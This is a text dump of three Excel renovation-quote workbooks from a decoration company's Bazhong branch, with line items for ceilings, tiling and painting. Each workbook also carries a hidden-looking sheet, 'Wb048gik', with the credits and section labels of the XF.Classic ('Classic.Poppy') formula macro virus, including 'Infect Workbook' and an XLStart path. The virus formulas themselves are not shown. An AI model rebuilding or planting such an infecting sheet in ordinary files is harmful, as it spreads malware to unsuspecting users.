======================================================================
FILE: 地砖.xlsx
======================================================================
Sheets: ['2019报价', 'Wb048gik']

--- Sheet: 2019报价 ---
Dimensions: A1:FM176 MaxRow: 176 MaxCol: 169
 1 ['                                                                                      广东帝豪装饰集团巴中分公司（工程预算单）\n', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
 2 ['工程名称：印江洲2#12-2何先生雅居\n             ', '', '', '', '', '', '', '', '46096', '', '', '', '', '', '']
 3 ['公司地址:巴中市黄家沟居然之家四楼2-4-009号                                        电话:0827-3888300', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
 4 ['序号', '项目内容', '数量', '单位', '材料', '', '人工', '', '施工工艺及材料说明', '', '', '', '', '', '']
 5 ['', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
 6 ['', '', '', '', '单价', '合价', '单价', '合价', '', '', '', '', '', '', '']
 7 ['', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
 8 ['一', '客厅、餐厅及阳台', '', '', '', '', '', '', '', '', '', '', '', '', '']
 9 ['1', '窗帘盒', '3', 'M', '70', '210', '25', '75', '欧松板、石膏板、辅料、人工及机具费。', '', '', '', '', '', '']
10 ['2', '石膏板平面天花', '3.5', 'M2', '95', '332.5', '55', '192.5', '木龙骨或轻钢龙骨框架结构、膨胀螺丝固定、纸面石膏板封面（以展开面积计算)、乳胶漆另计', '', '', '', '', '', '']
11 ['3', '造型天花', '21.5', 'M2', '125', '2687.5', '65', '1397.5', '木龙骨或轻钢龙骨框架，造型位置夹板框架、纸面石膏板封面(以展开面积计算)、弧型处夹板衬底、乳胶漆另计。', '', '', ' ', '', '', '']
12 ['4', '天花虚光灯槽', '0', 'm', '38', '0', '22', '0', '欧松板打底石膏板封面，辅料、人工及机具费。', '', '', '', '', '', '']
13 ['5', '50-60MM优质艺术石膏线', '', 'M', '14', '0', '8', '0', '1、普通艺术石膏线、快粘粉粘贴、直钉固定。2、人工及机具费。', '', '', '', '', '', '']
14 ['6', '80MM优质艺术石膏线', '', 'M', '16', '0', '10', '0', '1、普通艺术石膏线、快粘粉粘贴、直钉固定。2、人工及机具费。', '', '', '', '', '', '']
15 ['7', '艺术石膏线刷漆', '', 'M', '4', '0', '6.5', '0', '石膏线或PU角线刷漆', '', '', '', '', '', '']
16 ['8', '客厅及餐厅正铺地砖（600*1200MM）', '34.8', 'M2', '28', '974.4', '48', '1670.4', '１、强度32.5MPa普通硅酸盐水泥、水泥沙浆铺设等辅料及人工工资。2、地砖、水泥、砂浆厚度超过4CM按找平另计。（地砖业主自购）', '', '', '', '', '', '']
17 ['9', '勾缝处理', '', 'M2', '0', '0', '2.5', '0', '人工、辅料及瓷砖缝清洗', '', '', '', '', '', '']
18 ['10', '造型基层', '10.5', 'M2', '135', '1417.5', '95', '997.5', '木龙骨框架结构，膨胀螺丝固定，欧松板封面刷防潮油、人工及机具费。（***业主自购）', '', '', '', '', '', '']
19 ['11', '墙顶面基层加固', '120', 'M2', '2', '240', '4', '480', '鸟巢界面剂或德高界面剂、人工及机具费。', '', '', '', '', '', '']
20 ['12', '墙面基层处理（鸟巢腻子）', '120', 'M2', '19', '2280', '13', '1560', '鸟巢水性嵌缝石膏补顶缝、瑞安健康找平腻子底层、瑞安健康腻子面层、白布、砂纸、牛皮纸、人工及机具费。', '', '', '', '', '', '']
21 ['13', '芬琳芬华五合一内墙乳胶漆', '120', 'M2', '12', '1440', '7', '840', '1、底漆、面漆、人工及机具费。(有色漆每平米另加3元、若要求喷漆另加3元）', '', '', '', '', '', '']
22 ['14', '墙面漆护角', '1', '项', '160', '160', '360', '360', '天花及墙面阳角护角、人工及机具费。', '', '', '', '', '', '']
23 ['15', '防潮处理', '10.5', 'M2', '25', '262.5', '10', '105', '1、木制作与墙面接触处刷防潮油，中间防潮棉相隔。2、人工工资', '', '', '', '', '', '']
24 ['16', '地面保护', '34.8', 'M2', '12', '417.6', '5', '174', '广东帝豪装饰专用保护棉、辅料及人工', '', '', '', '', '', '']
25 ['', '小计', '', '', '', '10422', '', '7851.9', '', '', '', '', '', '', '']
26 ['二', '厨房', '', '', '', '', '', '', '', '', '', '', '', '', '']
27 ['1', '铺地砖（正贴）', '6.5', 'M2', '28', '182', '32', '208', '１、强度32.5MPa普通硅酸盐水泥、水泥沙浆铺设等辅料及人工工资。2、地砖、水泥、砂浆厚度超过4CM按找平另计。（地砖业主自购）', '', '', '', '', '', '']
28 ['2', '墙面贴瓷片', '21.1', 'M2', '28', '590.8', '40', '844', '强度32.5MPa水泥、水泥沙浆铺设及人工工资。（瓷片业主自购、瓷砖胶粘贴另加15元／M2）', '', '', '', '', '', '']
29 ['3', '墙面瓷砖刷背胶', '21.1', 'M2', '0', '0', '9', '189.9', '瓷砖背面刷瓷砖背胶，人工及机具费。（背胶业主自购）', '', '', '', '', '', '']
30 ['4', '墙面瓷片碰角加工', '', 'M', '8', '0', '20', '0', '1、双面瓷片加工内边成直角拼接。2、人工及机具费。', '', '', '', '', '', '']

--- Sheet: Wb048gik ---
Dimensions: A1:C26 MaxRow: 26 MaxCol: 3
 1 ['报价单（秦女士）.xls', '', '']
 2 ['Book1', '', '']
 3 ['C:\\Program Files\\Microsoft Office\\Office\\xlstart\\Book1.', '', '**Auto and On Sheet Starts Here**']
 4 ['1', '', '']
 5 ['', '', '']
 6 ['', '', '']
 7 ['Classic.Poppy by VicodinES', '', '']
 8 ['With Lord Natas', '', '']
 9 ['An Excel Formula Macro Virus (XF.Classic)', '', '']
10 ['Hydrocodone/APAP 10-650 For Your Computer', '', '']
11 ['(C) The Narkotic Network 1998', '', '']
12 ['', '', '']
13 ['', '', '']
14 ['**Simple Payload**', '', '']
15 ['', '', '']
16 ['', '', '']
17 ['', '', '**Set Our Values and Paths**']
18 ['', '', '']
19 ['', '', '']
20 ['**Add New Workbook, Infect It, Save It As Book1.xls**', '', '']
21 ['', '', '']
22 ['', '', '']
23 ['', '', '']
24 ['', '', '']
25 ['', '', '']
26 ['', '', '**Infect Workbook**']
======================================================================
FILE: 木地板.xlsx
======================================================================
Sheets: ['2019报价', 'Wb048gik']

--- Sheet: 2019报价 ---
Dimensions: A1:FM168 MaxRow: 168 MaxCol: 169
 1 ['                                                                                      广东帝豪装饰集团巴中分公司（工程预算单）\n', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
 2 ['工程名称：半山逸城2期12-101苟先生            ', '', '', '', '', '', '', '', '44677', '', '', '', '', '', '']
 3 ['公司地址:巴中市黄家沟居然之家四楼2-4-009号                                        电话:0827-3888300', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
 4 ['序号', '项目内容', '数量', '单位', '材料', '', '人工', '', '施工工艺及材料说明', '', '', '', '', '', '']
 5 ['', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
 6 ['', '', '', '', '单价', '合价', '单价', '合价', '', '', '', '', '', '', '']
 7 ['', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
 8 ['一', '客厅、餐厅及阳台', '', '', '', '', '', '', '', '', '', '', '', '', '']
 9 ['1', '窗帘盒', '4', 'M', '70', '280', '25', '100', '欧松板、石膏板、辅料、人工及机具费。', '', '', '', '', '', '']
10 ['2', '石膏板平面天花', '7.5', 'M2', '95', '712.5', '55', '412.5', '木龙骨或轻钢龙骨框架结构、膨胀螺丝固定、纸面石膏板封面（以展开面积计算)、乳胶漆另计', '', '', '', '', '', '']
11 ['3', '造型天花', '29.5', 'M2', '125', '3687.5', '65', '1917.5', '木龙骨或轻钢龙骨框架，造型位置夹板框架、纸面石膏板封面(以展开面积计算)、弧型处夹板衬底、乳胶漆另计。', '', '', ' ', '', '', '']
12 ['4', '天花虚光灯槽', '0', 'm', '38', '0', '22', '0', '欧松板打底石膏板封面，辅料、人工及机具费。', '', '', '', '', '', '']
13 ['5', '50-60MM优质艺术石膏线', '', 'M', '14', '0', '8', '0', '1、普通艺术石膏线、快粘粉粘贴、直钉固定。2、人工及机具费。', '', '', '', '', '', '']
14 ['6', '80MM优质艺术石膏线', '', 'M', '16', '0', '10', '0', '1、普通艺术石膏线、快粘粉粘贴、直钉固定。2、人工及机具费。', '', '', '', '', '', '']
15 ['7', '艺术石膏线刷漆', '', 'M', '4', '0', '6.5', '0', '石膏线或PU角线刷漆', '', '', '', '', '', '']
16 ['8', '客厅及餐厅正铺地砖（300-800MM）', '41.1', 'M2', '28', '1150.8', '32', '1315.2', '１、强度32.5MPa普通硅酸盐水泥、水泥沙浆铺设等辅料及人工工资。2、地砖、水泥、砂浆厚度超过4CM按找平另计。（地砖业主自购）', '', '', '', '', '', '']
17 ['9', '勾缝处理', '', 'M2', '0', '0', '2.5', '0', '人工、辅料及瓷砖缝清洗', '', '', '', '', '', '']
18 ['10', '造型基层', '9.5', 'M2', '135', '1282.5', '95', '902.5', '木龙骨框架结构，膨胀螺丝固定，欧松板封面刷防潮油、人工及机具费。（***业主自购）', '', '', '', '', '', '']
19 ['11', '墙顶面基层加固', '132', 'M2', '2', '264', '4', '528', '德高界面剂、人工及机具费。', '', '', '', '', '', '']
20 ['12', '墙面基层处理（鸟巢腻子）', '132', 'M2', '19', '2508', '13', '1716', '鸟巢水性嵌缝石膏补顶缝、瑞安健康找平腻子底层、瑞安健康腻子面层、白布、砂纸、牛皮纸、人工及机具费。', '', '', '', '', '', '']
21 ['13', '芬琳芬华五合一内墙乳胶漆', '132', 'M2', '12', '1584', '7', '924', '1、底漆、面漆、人工及机具费。(有色漆每平米另加3元、若要求喷漆另加3元）', '', '', '', '', '', '']
22 ['14', '墙面漆护角', '1', '项', '160', '160', '360', '360', '天花及墙面阳角护角、人工及机具费。', '', '', '', '', '', '']
23 ['15', '防潮处理', '9.5', 'M2', '25', '237.5', '10', '95', '1、木制作与墙面接触处刷防潮油，中间防潮棉相隔。2、人工工资', '', '', '', '', '', '']
24 ['16', '地面保护', '41.1', 'M2', '12', '493.2', '5', '205.5', '广东帝豪装饰专用保护棉、辅料及人工', '', '', '', '', '', '']
25 ['', '小计', '', '', '', '12360', '', '8476.2', '', '', '', '', '', '', '']
26 ['二', '厨房', '', '', '', '', '', '', '', '', '', '', '', '', '']
27 ['1', '铺地砖（正贴）', '7.8', 'M2', '28', '218.4', '32', '249.6', '１、强度32.5MPa普通硅酸盐水泥、水泥沙浆铺设等辅料及人工工资。2、地砖、水泥、砂浆厚度超过4CM按找平另计。（地砖业主自购）', '', '', '', '', '', '']
28 ['2', '墙面贴瓷片', '28.6', 'M2', '28', '800.8', '40', '1144', '强度32.5MPa水泥、水泥沙浆铺设及人工工资。（瓷片业主自购、瓷砖胶粘贴另加15元／M2）', '', '', '', '', '', '']
29 ['3', '墙面瓷砖刷背胶', '28.6', 'M2', '0', '0', '9', '257.4', '瓷砖背面刷瓷砖背胶，人工及机具费。（背胶业主自购）', '', '', '', '', '', '']
30 ['4', '墙面瓷片碰角加工', '', 'M', '8', '0', '20', '0', '1、双面瓷片加工内边成直角拼接。2、人工及机具费。', '', '', '', '', '', '']

--- Sheet: Wb048gik ---
Dimensions: A1:C26 MaxRow: 26 MaxCol: 3
 1 ['报价单（秦女士）.xls', '', '']
 2 ['Book1', '', '']
 3 ['C:\\Program Files\\Microsoft Office\\Office\\xlstart\\Book1.', '', '**Auto and On Sheet Starts Here**']
 4 ['1', '', '']
 5 ['', '', '']
 6 ['', '', '']
 7 ['Classic.Poppy by VicodinES', '', '']
 8 ['With Lord Natas', '', '']
 9 ['An Excel Formula Macro Virus (XF.Classic)', '', '']
10 ['Hydrocodone/APAP 10-650 For Your Computer', '', '']
11 ['(C) The Narkotic Network 1998', '', '']
12 ['', '', '']
13 ['', '', '']
14 ['**Simple Payload**', '', '']
15 ['', '', '']
16 ['', '', '']
17 ['', '', '**Set Our Values and Paths**']
18 ['', '', '']
19 ['', '', '']
20 ['**Add New Workbook, Infect It, Save It As Book1.xls**', '', '']
21 ['', '', '']
22 ['', '', '']
23 ['', '', '']
24 ['', '', '']
25 ['', '', '']
26 ['', '', '**Infect Workbook**']
======================================================================
FILE: 通江金外滩邵先生.xlsx
======================================================================
Sheets: ['626', 'Wb048gik']

--- Sheet: 626 ---
Dimensions: A1:FM223 MaxRow: 223 MaxCol: 169
 1 ['                                                                                      广东帝豪装饰集团巴中分公司（工程预算单）\n', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
 2 ['工程名称：通江金外滩邵先生\n             ', '', '', '', '', '', '', '', '46199', '', '', '', '', '', '']
 3 ['公司地址:巴中市黄家沟居然之家四楼2-4-009号                                        电话:0827-3888300', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
 4 ['序号', '项目内容', '数量', '单位', '材料', '', '人工', '', '施工工艺及材料说明', '', '', '', '', '', '']
 5 ['', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
 6 ['', '', '', '', '单价', '合价', '单价', '合价', '', '', '', '', '', '', '']
 7 ['', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
 8 ['一', '客厅、餐厅及阳台', '', '', '', '', '', '', '', '', '', '', '', '', '']
 9 ['1', '窗帘盒', '6.9', 'M', '70', '483', '25', '172.5', '欧松板、石膏板、辅料、人工及机具费。', '', '', '', '', '', '']
10 ['2', '石膏板平面天花', '0', 'M2', '95', '0', '55', '0', '木龙骨或轻钢龙骨框架结构、膨胀螺丝固定、纸面石膏板封面（以展开面积计算)、乳胶漆另计', '', '', '', '', '', '']
11 ['3', '造型天花', '53', 'M2', '125', '6625', '65', '3445', '木龙骨或轻钢龙骨框架，造型位置夹板框架、纸面石膏板封面(以展开面积计算)、弧型处夹板衬底、乳胶漆另计。', '', '', ' ', '', '', '']
12 ['4', '天花虚光灯槽', '23.2', 'm', '38', '881.6', '22', '510.4', '欧松板打底石膏板封面，辅料、人工及机具费。', '', '', '', '', '', '']
13 ['5', '天花预埋灯槽', '5.2', 'm', '32', '166.4', '22', '114.4', '欧松板打底石膏板封面，辅料、人工及机具费。', '', '', '', '', '', '']
14 ['6', '50-60MM优质艺术石膏线', '', 'M', '14', '0', '8', '0', '1、普通艺术石膏线、快粘粉粘贴、直钉固定。2、人工及机具费。', '', '', '', '', '', '']
15 ['7', '80MM优质艺术石膏线', '', 'M', '16', '0', '10', '0', '1、普通艺术石膏线、快粘粉粘贴、直钉固定。2、人工及机具费。', '', '', '', '', '', '']
16 ['8', '艺术石膏线刷漆', '', 'M', '4', '0', '6.5', '0', '石膏线或PU角线刷漆', '', '', '', '', '', '']
17 ['9', '客厅及餐厅正铺地砖（750*1500MM）', '42', 'M2', '28', '1176', '71', '2982', '１、强度32.5MPa普通硅酸盐水泥、水泥沙浆铺设等辅料及人工工资。2、地砖、水泥、砂浆厚度超过4CM按找平另计。（地砖业主自购）', '', '', '', '', '', '']
18 ['10', '勾缝处理', '', ' ', '0', '0', '2.5', '0', '人工、辅料及瓷砖缝清洗', '', '', '', '', '', '']
19 ['11', '造型基层', '0', 'M2', '135', '0', '95', '0', '木龙骨框架结构，膨胀螺丝固定，欧松板封面刷防潮油、人工及机具费。（***业主自购）', '', '', '', '', '', '']
20 ['12', '墙顶面基层加固', '132', 'M2', '2', '264', '4', '528', '鸟巢界面剂或德高界面剂、人工及机具费。', '', '', '', '', '', '']
21 ['13', '墙面基层处理（鸟巢腻子）', '132', 'M2', '19', '2508', '13', '1716', '鸟巢水性嵌缝石膏补顶缝、瑞安健康找平腻子底层、瑞安健康腻子面层、白布、砂纸、牛皮纸、人工及机具费。', '', '', '', '', '', '']
22 ['14', '芬琳芬华五合一内墙乳胶漆', '0', 'M2', '12', '0', '7', '0', '1、底漆、面漆、人工及机具费。(有色漆每平米另加3元、若要求喷漆另加3元）', '', '', '', '', '', '']
23 ['15', '墙面漆护角', '1', '项', '260', '260', '580', '580', '天花及墙面阳角护角、人工及机具费。(复式楼)', '', '', '', '', '', '']
24 ['16', '防潮处理', '8.7', 'M2', '25', '217.5', '10', '87', '1、木制作与墙面接触处刷防潮油，中间防潮棉相隔。2、人工工资', '', '', '', '', '', '']
25 ['17', '地面保护', '42', 'M2', '12', '504', '5', '210', '广东帝豪装饰专用保护棉、辅料及人工', '', '', '', '', '', '']
26 ['', '小计', '', '', '', '13085.5', '', '10345.3', '', '', '', '', '', '', '']
27 ['二', '厨房', '', '', '', '', '', '', '', '', '', '', '', '', '']
28 ['1', '铺地砖（正贴）（700*1500mm）', '5.3', 'M2', '28', '148.4', '71', '376.3', '１、强度32.5MPa普通硅酸盐水泥、水泥沙浆铺设等辅料及人工工资。2、地砖、水泥、砂浆厚度超过4CM按找平另计。（地砖业主自购）', '', '', '', '', '', '']
29 ['2', '墙面贴瓷片', '20', 'M2', '28', '560', '40', '800', '强度32.5MPa水泥、水泥沙浆铺设及人工工资。（瓷片业主自购、瓷砖胶粘贴另加15元／M2）', '', '', '', '', '', '']
30 ['3', '墙面瓷砖刷背胶', '20', 'M2', '0', '0', '9', '180', '瓷砖背面刷瓷砖背胶，人工及机具费。（背胶业主自购）', '', '', '', '', '', '']

--- Sheet: Wb048gik ---
Dimensions: A1:C26 MaxRow: 26 MaxCol: 3
 1 ['报价单（秦女士）.xls', '', '']
 2 ['Book1', '', '']
 3 ['C:\\Program Files\\Microsoft Office\\Office\\xlstart\\Book1.', '', '**Auto and On Sheet Starts Here**']
 4 ['1', '', '']
 5 ['', '', '']
 6 ['', '', '']
 7 ['Classic.Poppy by VicodinES', '', '']
 8 ['With Lord Natas', '', '']
 9 ['An Excel Formula Macro Virus (XF.Classic)', '', '']
10 ['Hydrocodone/APAP 10-650 For Your Computer', '', '']
11 ['(C) The Narkotic Network 1998', '', '']
12 ['', '', '']
13 ['', '', '']
14 ['**Simple Payload**', '', '']
15 ['', '', '']
16 ['', '', '']
17 ['', '', '**Set Our Values and Paths**']
18 ['', '', '']
19 ['', '', '']
20 ['**Add New Workbook, Infect It, Save It As Book1.xls**', '', '']
21 ['', '', '']
22 ['', '', '']
23 ['', '', '']
24 ['', '', '']
25 ['', '', '']
26 ['', '', '**Infect Workbook**']
